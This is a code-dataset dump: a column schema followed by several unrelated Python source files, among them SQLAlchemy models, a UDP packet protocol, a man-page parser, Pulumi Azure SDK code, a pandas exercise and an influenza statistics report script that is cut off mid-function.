blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
385ed7afa8909d244246af00611da2c352bb1d35
|
d50d8911fa4980d9590454a31c979d427f77d81c
|
/models.py
|
81727d078707a1b8e0f70251de18168fdc7a0a24
|
[] |
no_license
|
Minigamy/TestTask2
|
1c9db9d3ad89b20e5af1d9c8a34936efb34d4320
|
38b4a9d4bc85c3d57f7872db98b3e9869eabf943
|
refs/heads/master
| 2023-06-16T01:13:38.967164
| 2021-07-08T20:55:44
| 2021-07-08T20:55:44
| 384,186,413
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 737
|
py
|
from sqlalchemy import Integer, BigInteger, VARCHAR, Text
from sqlalchemy.sql.schema import Column, ForeignKey
from database import Base
class Anagram(Base):
__tablename__ = "anagram"
id = Column(Integer, primary_key=True)
count = Column(Integer)
class Devices(Base):
__tablename__ = "devices"
id = Column(BigInteger, primary_key=True)
dev_id = Column(VARCHAR(200), nullable=False)
dev_type = Column(VARCHAR(120), nullable=False)
class Endpoints(Base):
__tablename__ = "endpoints"
id = Column(BigInteger, primary_key=True, nullable=False)
device_id = Column(Integer, ForeignKey('devices.id', ondelete="cascade", onupdate="cascade"), default=None)
comment = Column(Text, default=None)
|
[
"ferdinand-f@mail.ru"
] |
ferdinand-f@mail.ru
|
a1d6235994d31b5d3bf8f83841b12c2ae810fd81
|
e7c3f8a813cd7cae5978cbf2b0d54821214dfac7
|
/communicator.py
|
d40ff42ba7d573261e5d84b5bccbfa6d0ed199a9
|
[] |
no_license
|
gefunk/RxP-Protocol
|
1faa050858319f8dc18503b53f34f3035b111c83
|
7385a16231907dc82f8382f60074ee1462425765
|
refs/heads/master
| 2021-01-10T11:15:10.340194
| 2015-11-26T17:05:56
| 2015-11-26T17:05:56
| 46,640,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,719
|
py
|
import logging
import time
from threading import Timer
from packet import RxPacket
from packet import RxPFlags
from select import select
class RxPCommunicator:
def __init__(self,socket, loglevel=logging.DEBUG):
self.logger = logging.getLogger("RxPCommunicator")
self.loglevel = loglevel
# create console handler and set level to debug
self.logger.setLevel(loglevel)
# create console handler and set level to debug
ch = logging.StreamHandler()
ch.setLevel(loglevel)
# create formatter
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# add formatter to ch
ch.setFormatter(formatter)
# add ch to logger
self.logger.addHandler(ch)
# the buffer to read from the
self.BUFFER_SIZE = 512
# set packet retry delay to 5 seconds
self.RETRY_DELAY = 5.0
# packets waiting to be acked, we keep this to check for resend
self.waiting_to_be_acked={}
# keep track of if the RETRY Thread Running
self.RETRY_THREAD = False
# set socket to the passed in socket
self.sock = socket
# packet sequence
self.packet_sequence_number = 0
# alive status
self.ALIVE = True
"""
Send a connection SYN ACK To tell the client that we are here and listening
We are going to ACKnowledge that we received the packet by sending the sequence number
we received as the ACK number
And tell the client to initialize by ACK our first packet
This is is a private method
"""
def sendCONNECTSYNACK(self, sourceip, sourceport, packet):
flags = [RxPFlags.SYN, RxPFlags.ACK]
ack = packet.sequence
seq = self.packet_sequence_number
synack_packet = RxPacket(
flags=flags,
sequence=seq,
ack=ack,
sourceip=sourceip,
destinationip=packet.sourceip,
sourceport=sourceport,
destport=packet.sourceport)
self.logger.debug("Sending SYNACK packet")
self.send_packet(synack_packet)
"""Send a SYN packet to initiate a connection with the server"""
def sendCONNECTSYN(self, sourceip, sourceport, destinationip, destport):
flags = [RxPFlags.SYN]
seq = self.__get_next_packet_sequence_number()
syn_packet = RxPacket(
flags,
seq,
sourceip=sourceip,
destinationip=destinationip,
sourceport=sourceport,
destport=destport)
self.logger.debug("Sending SYN Packet")
self.send_packet(syn_packet)
return seq
'''Send a packet to ACKnowledge a SYNACK or FIN packet'''
def sendACK(self, sourceport, sourceip, packet):
flags = [RxPFlags.ACK]
ack_packet = RxPacket(
flags=flags,
sequence=None,
ack=packet.sequence,
sourceip=sourceip,
destinationip=packet.sourceip,
sourceport=sourceport,
destport=packet.sourceport)
self.logger.debug("Sending ACK packet")
self.send_packet(ack_packet)
"""Send a SYN packet to initiate a connection with the server"""
def sendCONNECTFIN(self, sourceip, sourceport, destinationip, destport):
flags = [RxPFlags.FIN]
seq = self.__get_next_packet_sequence_number()
fin_packet = RxPacket(
flags,
seq,
sourceip=sourceip,
destinationip=destinationip,
sourceport=sourceport,
destport=destport)
self.logger.debug("Sending FIN Packet")
self.send_packet(fin_packet)
return seq
"""Send a SYN packet to initiate a connection with the server"""
def sendDATA(self, sourceip, sourceport, destinationip, destport, data_in_bytes):
flags = [RxPFlags.DATA]
seq = self.__get_next_packet_sequence_number()
data_packet = RxPacket(
flags,
seq,
sourceip=sourceip,
destinationip=destinationip,
sourceport=sourceport,
destport=destport,
data=data_in_bytes)
self.logger.debug("Sending DATA Packet")
self.send_packet(data_packet)
return seq
def __get_next_packet_sequence_number(self):
self.packet_sequence_number += 1
return self.packet_sequence_number
def add_listener(self, key, listener):
self.listeners[key] = listener
def remove_listener(self, key):
del self.listeners[key]
def receive_packet(self):
data,addr = self.sock.recvfrom(self.BUFFER_SIZE)
packet = RxPacket.deserialize(data)
self.logger.debug("Received packet: %s" % str(packet))
'''Check if we have a non corrupt packet'''
if packet.checksum != RxPacket.calculate_checksum(packet):
self.logger.error("Corrupt Packet Detected, dropping packet %s", packet)
return None
# if packet contains an ACK, remove a waiting to be ACK'ed packet from the unacked list
if RxPFlags.ACK in packet.flags:
self.logger.debug("Waiting To be acked going to remove %s, these are the current keys: %s" % (packet.ack, self.waiting_to_be_acked.keys()))
del self.waiting_to_be_acked[packet.ack]
return packet
'''Send packet to destination'''
def send_packet(self, packet):
packet.checksum = RxPacket.calculate_checksum(packet)
self.logger.debug("Sending packet to %s at port %s: " % (packet.destinationip, packet.destport))
# set the packet send time
packet.sent_time = time.time()
# if the packet needs to be acked then it has to be added to the waiting to be acked list
if any(flag in [RxPFlags.SYN, RxPFlags.FIN, RxPFlags.DATA] for flag in packet.flags):
self.waiting_to_be_acked[packet.sequence] = packet
# if the RETRY Thread is not running, kick it off
if not self.RETRY_THREAD:
t = Timer(self.RETRY_DELAY, self.resend_unacked_packets)
t.setDaemon(True)
t.start()
self.RETRY_THREAD = True
# Send packet over UDP
self.sock.sendto(RxPacket.serialize(packet), (packet.destinationip, packet.destport))
self.logger.debug("Sent Packet, returning to calling function")
# Check every time period to see if there are unacked packets to be sent
def resend_unacked_packets(self):
if self.waiting_to_be_acked:
self.logger.debug("This is how many packets are waiting for acks: %s" % len(self.waiting_to_be_acked.keys()))
# loop through the unacked packets and resend them
for unacked_packet in self.waiting_to_be_acked:
self.logger.debug("This is the sequence of the current unacked packet %s" % unacked_packet)
elapsed_time = time.time() - self.waiting_to_be_acked[unacked_packet].sent_time
if elapsed_time > self.RETRY_DELAY:
self.send_packet(self.waiting_to_be_acked[unacked_packet])
# tell the retry thread to try again after delay, we have to keep retrying till the acked packets are done
t = Timer(self.RETRY_DELAY, self.resend_unacked_packets)
t.setDaemon(True)
t.start()
self.RETRY_THREAD = True
else:
self.logger.debug("There are no packets waiting to be acked, killing RETRY THREAD")
self.RETRY_THREAD = False
|
[
"rahul.gokulnath@turner.com"
] |
rahul.gokulnath@turner.com
|
55410aad4488ccbb5b370d1a12553de6645c96a7
|
95f06aea954777d369c4b19db44202a4225833c8
|
/scripts/generate_manpage_metadata.py
|
51e64cea17f47acf2782e955046ecdb909e9d315
|
[
"Apache-2.0"
] |
permissive
|
cs-education/sysassets
|
25e2a4dac5af6f8f1d4d999628245779e9f98615
|
9a7b3d8e2fa1d4cd741c6d3b22522f8aa418261c
|
refs/heads/gh-pages
| 2021-01-17T10:16:44.739695
| 2018-03-27T04:24:49
| 2018-03-27T04:24:49
| 22,890,900
| 4
| 8
|
Apache-2.0
| 2018-12-22T08:58:37
| 2014-08-12T20:10:41
|
HTML
|
UTF-8
|
Python
| false
| false
| 6,486
|
py
|
import os
import os.path
import urllib
from bs4 import BeautifulSoup
import json
import re
if __name__ != '__main__':
print 'This script is not meant to be imported!'
exit()
c_function_signature_re = re.compile(ur'(.*)[(](.*)[)];')
include_re = re.compile(ur'#include\s+[<](.+)[>]\s*(.*)\s*')
define_re = re.compile(ur'#define\s+(.+)\s*')
def get_param_type_and_name(param_str):
param = param_str.strip().split()
param_type = ' '.join(param[:-1])
param_var_name = param[-1]
if param_var_name[0] == '*':
param_type += ' *'
param_var_name = param_var_name[1:]
return param_type, param_var_name
def parse_synopsis_text(text):
"""
Parse a Linux Man Page's Synopsis section for C function signatures, #includes and #defines
Can be used to extract information about a system call, etc.
:param text: Text (without extra formatting, like HTML tags)
from the synopsis section of the man page
:return: A 3-tuple of function signatures, includes and defines. Each 'function signature' is an
object with function metadata (return type, name, parameters). Each 'include' is a string of the
#include file path, and each 'define' is the text after #define.
"""
function_signatures = []
hash_includes = []
hash_defines = []
# TODO: This script needs to be changed
# I realized it is better to separate man page index and autocomplete metadata into separate json files
if text:
for line in text.split('\n\n'):
line = line.strip()
c_function_signature_match = re.match(c_function_signature_re, ' '.join(line.split()))
if c_function_signature_match:
# Function signature
parameters = []
for param in c_function_signature_match.group(2).split(','):
param = get_param_type_and_name(param)
parameters.append({
'type': param[0],
'var': param[1]
})
function_type_and_name = get_param_type_and_name(c_function_signature_match.group(1))
function_signatures.append({
'return_type': function_type_and_name[0],
'name': function_type_and_name[1],
'parameters': parameters
})
else:
for l in line.split('\n'):
l = l.strip()
include_match = re.match(include_re, l)
define_match = re.match(define_re, l)
if include_match:
# include
hash_includes.append({
'file_path': include_match.group(1),
'comments': include_match.group(2)
})
elif define_match:
# define
hash_defines.append({
'text': define_match.group(1)
})
else:
# TODO: some function signatures do not get parsed
# TODO: some functions need special linker flags, parse them too
pass
#print l
return function_signatures, hash_includes, hash_defines
# sysassets man pages directory
if os.path.basename(os.getcwd()) == 'scripts':
sysassets_dir = '../'
else:
sysassets_dir = './'
sysassets_dir = os.path.abspath(sysassets_dir)
man_pages_path = os.path.join(sysassets_dir, 'man_pages/')
# Man pages metadata output json file
man_page_index_json_out_filename = os.path.join(man_pages_path, 'sys_man_page_index.json')
syscall_metadata_json_out_filename = os.path.join(man_pages_path, 'syscall_metadata.json')
# Directory to man pages in HTML form, which contains index.html
man_pages_html_path = os.path.join(man_pages_path, 'html')
# List of man page section directories (man1, man2, ...)
man_pages_section_dirs = next(os.walk(man_pages_html_path))[1]
# The list containing the man pages index, to be converted to json later
man_page_index = []
# The list of system calls and their metadata for autocomplete support in sysbuild
syscalls = []
for section_dir in man_pages_section_dirs:
print section_dir
section = int(section_dir[-1])
section_dir_path = os.path.join(man_pages_html_path, section_dir)
# Get list of man page html files in the section directory
file_names = next(os.walk(section_dir_path))[2]
for man_page_file_name in file_names:
# Get man page name from filename, e.g., 'accept' from accept.2.html
man_page_name = man_page_file_name.split('.')[0]
# Get a relative link to the man page's HTML file
html_url = urllib.pathname2url(os.path.join('html', section_dir, man_page_file_name))
with open(os.path.join(section_dir_path, man_page_file_name), 'r') as f:
soup = BeautifulSoup(f)
if soup.title.string != 'Invalid Man Page':
summary = soup.h2.next_sibling.strip()
# Do not include URL to keep JSON size small, as it can be constructed on the client
man_page_index.append({
'name': man_page_name,
'section': section,
'summary': summary,
#'url': html_url
})
# Syscall metadata
synopsis = soup.h2.find_next_sibling('pre')
synopsis_text = ''
if synopsis:
synopsis_text = synopsis.get_text()
function_metadata = parse_synopsis_text(synopsis_text)
if function_metadata[0] or function_metadata[1] or function_metadata[2]:
# TODO: this format needs to be changed to have functions at the top level of the list
syscalls.append({
'man_page': man_page_name,
'functions': function_metadata[0],
'includes': function_metadata[1],
'defines': function_metadata[2]
})
with open(man_page_index_json_out_filename, 'w') as json_out_file:
json.dump(man_page_index, json_out_file, indent=4, sort_keys=True)
with open(syscall_metadata_json_out_filename, 'w') as json_out_file:
json.dump(syscalls, json_out_file, indent=4, sort_keys=True)
|
[
"gupta.neelabh@gmail.com"
] |
gupta.neelabh@gmail.com
|
c9c1ad0ad8c72419dc88175791b797d14624cd57
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/compute/get_capacity_reservation.py
|
f5d8a1ef2536b428a2df2b96675b3a4d7785f489
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 9,077
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetCapacityReservationResult',
'AwaitableGetCapacityReservationResult',
'get_capacity_reservation',
]
@pulumi.output_type
class GetCapacityReservationResult:
"""
Specifies information about the capacity reservation.
"""
def __init__(__self__, id=None, instance_view=None, location=None, name=None, provisioning_state=None, provisioning_time=None, reservation_id=None, sku=None, tags=None, type=None, virtual_machines_associated=None, zones=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if instance_view and not isinstance(instance_view, dict):
raise TypeError("Expected argument 'instance_view' to be a dict")
pulumi.set(__self__, "instance_view", instance_view)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if provisioning_time and not isinstance(provisioning_time, str):
raise TypeError("Expected argument 'provisioning_time' to be a str")
pulumi.set(__self__, "provisioning_time", provisioning_time)
if reservation_id and not isinstance(reservation_id, str):
raise TypeError("Expected argument 'reservation_id' to be a str")
pulumi.set(__self__, "reservation_id", reservation_id)
if sku and not isinstance(sku, dict):
raise TypeError("Expected argument 'sku' to be a dict")
pulumi.set(__self__, "sku", sku)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
if virtual_machines_associated and not isinstance(virtual_machines_associated, list):
raise TypeError("Expected argument 'virtual_machines_associated' to be a list")
pulumi.set(__self__, "virtual_machines_associated", virtual_machines_associated)
if zones and not isinstance(zones, list):
raise TypeError("Expected argument 'zones' to be a list")
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="instanceView")
def instance_view(self) -> 'outputs.CapacityReservationInstanceViewResponse':
"""
The Capacity reservation instance view.
"""
return pulumi.get(self, "instance_view")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state, which only appears in the response.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="provisioningTime")
def provisioning_time(self) -> str:
"""
The date time when the capacity reservation was last updated.
"""
return pulumi.get(self, "provisioning_time")
@property
@pulumi.getter(name="reservationId")
def reservation_id(self) -> str:
"""
A unique id generated and assigned to the capacity reservation by the platform which does not change throughout the lifetime of the resource.
"""
return pulumi.get(self, "reservation_id")
@property
@pulumi.getter
def sku(self) -> 'outputs.SkuResponse':
"""
SKU of the resource for which capacity needs be reserved. The SKU name and capacity is required to be set. Currently VM Skus with the capability called 'CapacityReservationSupported' set to true are supported. Refer to List Microsoft.Compute SKUs in a region (https://docs.microsoft.com/rest/api/compute/resourceskus/list) for supported values.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="virtualMachinesAssociated")
def virtual_machines_associated(self) -> Sequence['outputs.SubResourceReadOnlyResponse']:
"""
A list of all virtual machine resource ids that are associated with the capacity reservation.
"""
return pulumi.get(self, "virtual_machines_associated")
@property
@pulumi.getter
def zones(self) -> Optional[Sequence[str]]:
"""
Availability Zone to use for this capacity reservation. The zone has to be single value and also should be part for the list of zones specified during the capacity reservation group creation. The zone can be assigned only during creation. If not provided, the reservation supports only non-zonal deployments. If provided, enforces VM/VMSS using this capacity reservation to be in same zone.
"""
return pulumi.get(self, "zones")
class AwaitableGetCapacityReservationResult(GetCapacityReservationResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetCapacityReservationResult(
id=self.id,
instance_view=self.instance_view,
location=self.location,
name=self.name,
provisioning_state=self.provisioning_state,
provisioning_time=self.provisioning_time,
reservation_id=self.reservation_id,
sku=self.sku,
tags=self.tags,
type=self.type,
virtual_machines_associated=self.virtual_machines_associated,
zones=self.zones)
def get_capacity_reservation(capacity_reservation_group_name: Optional[str] = None,
capacity_reservation_name: Optional[str] = None,
expand: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetCapacityReservationResult:
"""
Specifies information about the capacity reservation.
API Version: 2021-04-01.
:param str capacity_reservation_group_name: The name of the capacity reservation group.
:param str capacity_reservation_name: The name of the capacity reservation.
:param str expand: The expand expression to apply on the operation. 'InstanceView' retrieves a snapshot of the runtime properties of the capacity reservation that is managed by the platform and can change outside of control plane operations.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['capacityReservationGroupName'] = capacity_reservation_group_name
__args__['capacityReservationName'] = capacity_reservation_name
__args__['expand'] = expand
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:compute:getCapacityReservation', __args__, opts=opts, typ=GetCapacityReservationResult).value
return AwaitableGetCapacityReservationResult(
id=__ret__.id,
instance_view=__ret__.instance_view,
location=__ret__.location,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
provisioning_time=__ret__.provisioning_time,
reservation_id=__ret__.reservation_id,
sku=__ret__.sku,
tags=__ret__.tags,
type=__ret__.type,
virtual_machines_associated=__ret__.virtual_machines_associated,
zones=__ret__.zones)
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
fd59de77217def418240e6c5174cc806f21f4db6
|
e966c35bafed154b4feb53c1ad2887670fae6c2e
|
/pandas/pandas kayıp ve bozuk veriler.py
|
5ae1728ef2a1c318c32ee53414b62af31ed8a93e
|
[] |
no_license
|
Apoles/python_kod
|
487544cacfc2fe8c7ebac3f5b6c1d211fe440112
|
a3b6d7e435c996ab9fba47fd3021649b8fbc7f71
|
refs/heads/main
| 2023-02-06T17:52:02.116873
| 2020-12-24T20:42:30
| 2020-12-24T20:42:30
| 324,232,400
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,334
|
py
|
import pandas as pd
import numpy as np
data=np.random.randint(10,100,15).reshape(5,3)
df=pd.DataFrame(data, index=["a","c","e","f","h"], columns=["clm1","clm2","clm3"])
df=df.reindex(["a","b","c","d","e","f","g","h"])
result=df
result=df.drop("clm1",axis=1) #colmuns 1 i siler
result=df.drop("a",axis=0) # a indexsini siler
result=df.isnull() # nan olan değerleri false olarak döndürür
result=df.notnull() # nan olmayan veri olan değerleri false döndürür
result=df.isnull().sum() #nan değerleri toplar kaç tane oldugunu gösterir
result=df["clm2"].isnull().sum() #columns 2 deki nan değerleri toplar
newColumn=[np.nan,30,np.nan,51,np.nan,10,20,90]
df["clmn4"]=newColumn #yeni columns olşturduk
#print(df)
result=df
result=df[df["clmn4"].isnull()] #column 4 deki nan ları getirir
result=df[df["clmn4"].isnull()]["clmn4"]["a"]
result=df.dropna() #satırda nan değeri v varsa satırı siler
result=df.dropna(axis=1) #sütüda nan değeri varsa sutunu siler
result=df.dropna(how="all") # tüm satır nan ise satırı siler
result=df.dropna(subset=["clm2","clm1"]) # subset metodu ile sadece column lara bakılır
result=df.dropna(subset=["clm2","clm1"],how="all")
result=df.fillna(value="no input") #nan değerlere kendimiz bilgi atayaibliyoruz
print(result)
|
[
"noreply@github.com"
] |
Apoles.noreply@github.com
|
14e81ce0890ecae823ab6d5875ae15f4759c94de
|
c0e7af4c94102cb1c35cafd9cbf0916fcadf13f1
|
/dynamicApp/apps.py
|
8adeb1b77d1d4b97ea50e1afa5d372cda2926215
|
[
"Apache-2.0"
] |
permissive
|
TheMn/internet-engineering-project
|
e000e367a31556bc7a13fd7251883427168e7cda
|
54b748e23ffc93b081b4a0778108b7331a1db4e6
|
refs/heads/master
| 2023-07-29T14:29:45.327017
| 2023-07-18T06:58:05
| 2023-07-18T06:58:05
| 212,167,133
| 7
| 1
|
Apache-2.0
| 2022-12-08T11:58:23
| 2019-10-01T18:14:59
|
HTML
|
UTF-8
|
Python
| false
| false
| 95
|
py
|
from django.apps import AppConfig
class DynamicappConfig(AppConfig):
name = 'dynamicApp'
|
[
"mt.lroc@outlook.com"
] |
mt.lroc@outlook.com
|
cd896cba542a5374151a5c2ebe7a8c791ecac2c0
|
d9b880e62c4b3c9a4b5bdd49800ea02507c1b2e0
|
/medbank/middleware.py
|
c9462a1736ce88dfbc8f2e85ac97ab7ed0465dce
|
[] |
no_license
|
McHogardty/MedBank
|
e4a5c343fccecc26971585e963e935a3624c459a
|
96ace1001e55cd72f2d698dd72cb08ab0c76a6ef
|
refs/heads/master
| 2021-08-27T15:32:47.134071
| 2015-07-13T12:51:05
| 2015-07-13T12:51:05
| 39,011,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 263
|
py
|
from __future__ import unicode_literals
class ExtraErrorEmailInfoMiddleware(object):
def process_exception(self, request, exception):
try:
if request.user.is_authenticated():
request.META['USER_USERNAME'] = str(request.user.username)
except:
pass
|
[
"michaelhagarty@gmail.com"
] |
michaelhagarty@gmail.com
|
9b778d789472cdacd42c7d77dad43deb6b558e28
|
fc0ddf3a03ab73f1da805ec9d590843f271ff713
|
/py/vr/stat.py
|
87752bdb478641f9e00050a79e8b11c403abcff1
|
[
"MIT"
] |
permissive
|
acorg/ssm-report
|
4abcf0aca821e2720c59cc1feae625925887abfe
|
eecb082c280a991116f15751bfd63da8c5680d1f
|
refs/heads/master
| 2022-04-28T02:11:42.883010
| 2022-03-29T08:14:02
| 2022-03-29T08:14:02
| 107,971,608
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,165
|
py
|
import logging; module_logger = logging.getLogger(__name__)
from pathlib import Path
import sys, datetime, collections, re, csv, json, subprocess, lzma
# ======================================================================
from .lab import lab_display_name
sVirusTypeForFilename = {"all": "all", "a(h3n2)": "h3n2", "a(h1n1)": "h1n1pdm", "h1seas": "h1n1seas", "h7": "h7", "h5": "h5", "b": "b", "victoria": "vic", "yamagata": "yam", "bvictoria": "bvic", "byamagata": "byam", "": ""}
sContinents = ["ASIA", "AUSTRALIA-OCEANIA", "NORTH-AMERICA", "EUROPE", "RUSSIA", "AFRICA", "MIDDLE-EAST", "SOUTH-AMERICA", "CENTRAL-AMERICA"]
# sLabOrder = ["CDC", "NIMR", "NIID", "MELB"]
sLabOrder = ["CDC", "Crick", "NIID", "VIDRL"]
sContinentsForTables = sContinents + ['all', 'sera', 'sera_unique']
sHeader = {'ASIA': 'Asia', 'AUSTRALIA-OCEANIA': 'Oceania', 'NORTH-AMERICA': 'N America ', 'EUROPE': 'Europe', 'RUSSIA': 'Russia', 'AFRICA': 'Africa',
'MIDDLE-EAST': 'M East', 'SOUTH-AMERICA': 'S America', 'CENTRAL-AMERICA': 'C America', 'all': 'TOTAL', 'month': 'Year-Mo', 'year': 'Year',
'sera': 'Sera', 'sera_unique': 'Sr Unique'}
sPeriodForFilename = {'year': '-year', 'month': ''}
sVirusTypeOrder = ['all', 'A(H1N1)', 'A(H3N2)', 'B', 'BVICTORIA', 'BYAMAGATA']
# ----------------------------------------------------------------------
def make_stat(output_dir, hidb_dir, start, end, previous_stat_dir, make_all_names=False, make_tabs=True, make_csv=True, make_webpage=True):
module_logger.info('Updating stat in {} start={} end={}'.format(output_dir, start, end))
stat = _compute_stat(output_dir=output_dir, hidb_dir=hidb_dir, start=start, end=end)
previous_stat = _load_previous_stat(previous_stat_dir=previous_stat_dir)
if make_tabs:
_make_tabs(output_dir, stat, previous_stat)
if make_csv:
_make_csv(output_dir, stat)
if make_webpage:
_make_webpage(output_dir, stat)
# ----------------------------------------------------------------------
def _compute_stat(output_dir, hidb_dir, start, end):
output_dir.mkdir(exist_ok=True)
output = output_dir.joinpath("stat.json.xz")
subprocess.check_call("hidb5-stat --start '{start}' --end '{end}' --db-dir '{db_dir}' '{output}'".format(start=start, end=end, db_dir=hidb_dir, output=output), shell=True)
return json.load(lzma.LZMAFile(output, "rb"))
# ----------------------------------------------------------------------
def _load_previous_stat(previous_stat_dir):
previous_stat_path = previous_stat_dir and previous_stat_dir.joinpath('stat.json.xz')
if previous_stat_path and previous_stat_path.exists():
module_logger.info('Loading previous stat from {}'.format(previous_stat_path))
previous_stat = json.load(lzma.LZMAFile(previous_stat_path, "rb"))
else:
previous_stat = None
return previous_stat
# ----------------------------------------------------------------------
def _make_tabs(output_dir, stat, previous_stat):
for virus_type in stat['antigens']:
if virus_type != "BUNKNOWN":
for lab in stat['antigens'][virus_type]:
for period in ('month', 'year'):
_make_tab(output_dir=output_dir, output_suffix='.txt', stat=stat, previous_stat=previous_stat, virus_type=virus_type, lab=lab, period=period, make_header=_make_header_tab, make_line=_make_line_tab, make_separator=_make_separator_tab, make_footer=_make_footer_tab)
# ======================================================================
def _make_tab(output_dir, output_suffix, stat, previous_stat, virus_type, lab, period, make_header, make_line, make_separator, make_footer):
data_antigens = stat['antigens'][virus_type][lab]
data_sera_unique = stat['sera_unique'].get(virus_type, {}).get(lab, {})
data_sera = stat['sera'].get(virus_type, {}).get(lab, {})
if previous_stat:
previous_vt = _fix_virus_type_for_previous(virus_type, previous_stat)
previous_data_antigens = previous_stat['antigens'][previous_vt][lab]
previous_data_sera_unique = previous_stat['sera_unique'].get(previous_vt, {}).get(lab, {})
previous_data_sera = previous_stat['sera'].get(previous_vt, {}).get(lab, {})
else:
previous_data_antigens, previous_data_sera_unique, previous_data_sera = {}, {}, {}
filename = Path(output_dir, '{lab}-{virus_type}{period}-tab{output_suffix}'.format(virus_type=sVirusTypeForFilename[virus_type.lower()], lab=lab.lower(), period=sPeriodForFilename[period], output_suffix=output_suffix))
module_logger.info('Writing {}'.format(filename))
with filename.open('w') as output:
output.write(make_header(period))
previous_sum = collections.defaultdict(int)
has_previous = bool(previous_stat)
for date in make_dates(data_antigens, period):
output.write(make_line(date, data_antigens=data_antigens[date], data_sera=data_sera.get(date, {}), data_sera_unique=data_sera_unique.get(date, {}), period=period, has_previous=has_previous, previous_data_antigens=previous_data_antigens.get(date, {}), previous_data_sera=previous_data_sera.get(date, {}).get('all', 0), previous_data_sera_unique=previous_data_sera_unique.get(date, {}).get('all', 0)))
if has_previous:
for continent in sContinentsForTables[:-2]:
previous_sum[continent] += previous_data_antigens.get(date, {}).get(continent, 0)
previous_sum['sera'] += previous_data_sera.get(date, {}).get('all', 0)
previous_sum['sera_unique'] += previous_data_sera_unique.get(date, {}).get('all', 0)
output.write(make_separator(solid=False, eol='\n'))
output.write(make_line('all', data_antigens=data_antigens['all'], data_sera=data_sera.get('all', {}), data_sera_unique=data_sera_unique.get('all', {}), period=period, has_previous=has_previous, previous_data_antigens=previous_sum, previous_data_sera=previous_sum['sera'], previous_data_sera_unique=previous_sum['sera_unique']))
output.write(make_separator(solid=True, eol='\n'))
output.write(make_footer())
# ----------------------------------------------------------------------
def _make_header_tab(period):
return '\n'.join((_make_separator_tab(solid=True, eol=''), _make_continent_names(period), _make_separator_tab(solid=False, eol=''), ''))
# ----------------------------------------------------------------------
def _make_line_tab(date, data_antigens, data_sera, data_sera_unique, period, has_previous, previous_data_antigens, previous_data_sera, previous_data_sera_unique):
def diff_current_previous(continent):
diff = data_antigens.get(continent, 0) - previous_data_antigens.get(continent, 0)
if diff < 0:
